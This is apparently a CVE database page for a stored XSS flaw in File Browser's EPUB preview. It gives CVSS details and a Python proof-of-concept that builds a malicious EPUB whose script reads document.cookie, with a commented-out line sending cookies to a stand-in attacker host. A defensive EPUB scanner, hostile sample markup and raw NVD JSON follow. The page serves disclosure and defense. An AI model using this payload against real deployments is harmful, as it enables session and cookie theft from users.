Security Vulnerability Report
CVE-2026-34529 CVSS 7.6 HIGH

CVE-2026-34529

Published: 2026-04-01 21:17:01
Last Modified: 2026-04-06 20:39:48

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the EPUB preview function in File Browser is vulnerable to Stored Cross-Site Scripting (XSS). JavaScript embedded in a crafted EPUB file executes in the victim's browser when they preview the file. This issue has been patched in version 2.62.2.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser < 2.62.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# Proof of Concept (PoC) generator for CVE-2026-34529
# This script creates a malicious EPUB file containing an XSS payload.

import zipfile
import os


def create_malicious_epub(filename='malicious.epub'):
    # Create a temporary directory structure for the EPUB
    os.makedirs('OEBPS', exist_ok=True)

    # 1. Create the mimetype file (must be uncompressed)
    with open('mimetype', 'w') as f:
        f.write('application/epub+zip')

    # 2. Create container.xml
    os.makedirs('META-INF', exist_ok=True)
    with open('META-INF/container.xml', 'w') as f:
        f.write('''<?xml version="1.0"?>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
  <rootfiles>
    <rootfile full-path="OEBPS/content.xhtml" media-type="application/xhtml+xml"/>
  </rootfiles>
</container>''')

    # 3. Create the malicious XHTML content
    # The JavaScript payload executes when the file is previewed
    xss_payload = '''<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XSS PoC</title></head>
<body>
<h1>Normal EPUB Content</h1>
<script>
// Malicious code execution
alert('CVE-2026-34529 Exploited!');
console.log('Cookie: ' + document.cookie);
// fetch('http://attacker-server/?c=' + document.cookie);
</script>
</body>
</html>'''
    with open('OEBPS/content.xhtml', 'w') as f:
        f.write(xss_payload)

    # 4. Zip everything into an EPUB file
    with zipfile.ZipFile(filename, 'w') as zf:
        zf.write('mimetype', compress_type=zipfile.ZIP_STORED)
        zf.write('META-INF/container.xml')
        zf.write('OEBPS/content.xhtml')

    print(f"[+] Malicious EPUB file created: {filename}")
    print("[+] Upload this file to File Browser and preview it to trigger the XSS.")

    # Cleanup
    os.remove('mimetype')
    os.remove('META-INF/container.xml')
    os.remove('OEBPS/content.xhtml')
    os.rmdir('OEBPS')
    os.rmdir('META-INF')


if __name__ == "__main__":
    create_malicious_epub()
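The defender-side counterpart to the PoC above, as an added example that is not code from the CVE record or from the File Browser project (the page does not describe how version 2.62.2 fixes the issue, so this is an assumed defensive layer, not the project's patch): a server-side check that opens an uploaded EPUB, parses every markup entry in it and refuses the preview when it finds script elements, inline on* event handlers or javascript: URLs, which are exactly the constructs a crafted EPUB relies on to run script in the viewer's browser. The names `scan_epub`, `is_safe_to_preview` and `build_sample_epub`, and both sample chapters, are constructed for this example.

```python
#!/usr/bin/env python3
# Added example, not part of the CVE record or of the File Browser project:
# a pre-preview check that inspects an EPUB archive for active content
# (script elements, inline on* handlers, javascript: URLs) so a preview
# feature can refuse it. The actual fix in 2.62.2 is not described on the
# page; this is an assumed defensive layer, not the project's patch.
import io
import re
import zipfile
from html.parser import HTMLParser

# Entries inside the archive that a reader would render as markup.
DOCUMENT_SUFFIXES = ('.xhtml', '.html', '.htm', '.svg')
ACTIVE_ELEMENTS = {'script', 'iframe', 'object', 'embed'}
URL_ATTRIBUTES = {'href', 'src', 'xlink:href', 'data', 'action', 'formaction'}
JS_URL = re.compile(r'^\s*javascript:', re.IGNORECASE)


class ActiveContentFinder(HTMLParser):
    """Records every construct that would execute script when rendered."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag in ACTIVE_ELEMENTS:
            self.findings.append(f'<{tag}> element')
        for name, value in attrs:
            if name.startswith('on'):
                self.findings.append(f'<{tag} {name}> event handler')
            elif name in URL_ATTRIBUTES and value and JS_URL.match(value):
                self.findings.append(f'<{tag} {name}> javascript: URL')


def scan_epub(data: bytes) -> dict:
    """Map each document entry in the EPUB to the active content found in it."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(DOCUMENT_SUFFIXES):
                continue
            finder = ActiveContentFinder()
            finder.feed(zf.read(info.filename).decode('utf-8', errors='replace'))
            finder.close()
            if finder.findings:
                report[info.filename] = finder.findings
    return report


def is_safe_to_preview(data: bytes) -> bool:
    """True when no document entry carries script-bearing markup."""
    return not scan_epub(data)


def build_sample_epub(chapter_xhtml: str) -> bytes:
    """Constructed test data: a minimal EPUB-shaped zip around one chapter."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('mimetype', 'application/epub+zip', compress_type=zipfile.ZIP_STORED)
        zf.writestr('META-INF/container.xml',
                    '<?xml version="1.0"?><container version="1.0" '
                    'xmlns="urn:oasis:names:tc:opendocument:xmlns:container">'
                    '<rootfiles><rootfile full-path="OEBPS/content.opf" '
                    'media-type="application/oebps-package+xml"/></rootfiles></container>')
        zf.writestr('OEBPS/chapter1.xhtml', chapter_xhtml)
    return buf.getvalue()


# Constructed sample chapters: one plain, one carrying three script vectors.
BENIGN_CHAPTER = (
    '<html xmlns="http://www.w3.org/1999/xhtml"><body>'
    '<h1>Chapter 1</h1><p>Plain text with <a href="chapter2.xhtml">a link</a>.</p>'
    '</body></html>'
)
HOSTILE_CHAPTER = (
    '<html xmlns="http://www.w3.org/1999/xhtml"><body>'
    '<h1>Chapter 1</h1>'
    '<script>console.log(document.cookie)</script>'
    '<img src="missing.png" onerror="console.log(1)"/>'
    '<a href="javascript:void(0)">link</a>'
    '</body></html>'
)

if __name__ == '__main__':
    for label, chapter in (('benign', BENIGN_CHAPTER), ('hostile', HOSTILE_CHAPTER)):
        epub = build_sample_epub(chapter)
        print(label, 'safe' if is_safe_to_preview(epub) else scan_epub(epub))
```

A check of this kind is a backstop, not the primary control: markup-level denylists miss obscure vectors, so a preview feature should also render user-supplied EPUB content in a sandboxed frame on an origin that carries no session cookies, with a Content-Security-Policy that forbids script. The scan is still useful as a detection signal, since an upload that trips it is worth logging and reviewing regardless of whether the renderer would have been affected.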

References

https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2 (Product, Release Notes)
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-5vpr-4fgw-f69h (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34529", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:17:00.830", "lastModified": "2026-04-06T20:39:47.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the EPUB preview function in File Browser is vulnerable to Stored Cross-Site Scripting (XSS). JavaScript embedded in a crafted EPUB file executes in the victim's browser when they preview the file. This issue has been patched in version 2.62.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.62.2", "matchCriteriaId": "A22210FE-83DA-49B9-A015-543942FE731F"}]}]}], 
"references": [{"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-5vpr-4fgw-f69h", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}